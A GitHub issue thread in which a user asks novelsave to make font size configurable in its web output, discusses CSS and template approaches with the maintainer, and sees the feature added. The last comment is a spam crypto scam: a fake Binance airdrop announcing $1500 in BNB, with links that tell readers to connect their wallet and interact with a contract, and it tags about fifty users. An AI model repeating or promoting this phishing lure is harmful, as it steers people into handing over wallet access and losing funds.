### ISSUE TITLE
[Feature] WEB: CSS parameters in the config

### ISSUE THREAD

**Issue by idMysteries** [m-haisham/novelsave#75]
The project has a good idea with configs. Why not add "font-size" in addition to "novel.dir"?

It may not be easy to implement, but I think it's a good idea.

```
novelsave config set font-size --value "18px"
novelsave config set font-size --value "1.5em"
```

**Comment by idMysteries** [comment]
And the container "max-width: 1140px" may be possible...

**Comment by mensch272** [comment]
It looks like this would take a major rewrite of html packager since the current version uses bootstrap which does not allow easily changing such properties across the page.

**Comment by idMysteries** [comment]
Is it possible to add style to html template?
 :root --font-size=${fontsize}
 https://github.com/mensch272/novelsave/blob/decdc67d9538cd16f4f7b332010dae33dc254976/novelsave/resources/web/templates/index.html.mako#L7

**Comment by idMysteries** [comment]
You can pass a variable to the html template, which will be written to ":root"

**Comment by mensch272** [comment]
The properties defined in :root by bootstrap are easy (ex: colors) but font-size differs from component to component and bootstrap doesn't use variables for those.

**Comment by idMysteries** [comment]
Book chapter uses font size from <body>
You are using local bootstrap file
https://github.com/mensch272/novelsave/blob/main/novelsave/resources/web/bootstrap.min.css
 "font-size:1rem;" ->  "font-size:var(--chapter-font-size);"

**Comment by mensch272** [comment]
It's worth a shot.

**Comment by idMysteries** [comment]
F*** I am stupid
You can just add another class here:
https://github.com/mensch272/novelsave/blob/decdc67d9538cd16f4f7b332010dae33dc254976/novelsave/resources/web/templates/index.html.mako#L60

Like:
``` html
<article id="${chapter_wrapper['id']}" class="mb-4 chapter-content"> 
```

And in the head write the style for the template, for ex.:
<style>.chapter-content { font-size: ${font_size} }</style>

**Comment by mensch272** [comment]
I've added the ability to change font-size.

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @lscherub, @kegonomics, @vzg100, @glenbreaks, @tetelevm, @eshnil2000, @sosudo, @joaopalmeiro, @Yuanyushen, @Gabe-flomo, @skyow001, @Transformerx, @araviel-io, @dodoowang, @e1e55, @Alex-Fay, @gugiserman, @meyt, @horstjens, @singhKaramjeet, @saniauzma, @Indurupi, @gk7279, @phillip1029, @kopytjuk, @zjm008, @fly51fly, @brightrhino, @subhashishansda4, @kommit, @patofoto, @dhakkann, @zymelaii, @inter1965, @xana-rahmani, @errchh, @dimashahbari, @bsormagec, @glesica, @heyong0228, @letangers, @amiham-singh, @AshifulRidoy, @rickynbg, @sophiahhuang, @eyadsibai, @bitruss, @alexanderkoh, @s-weigand, @jcrc1702
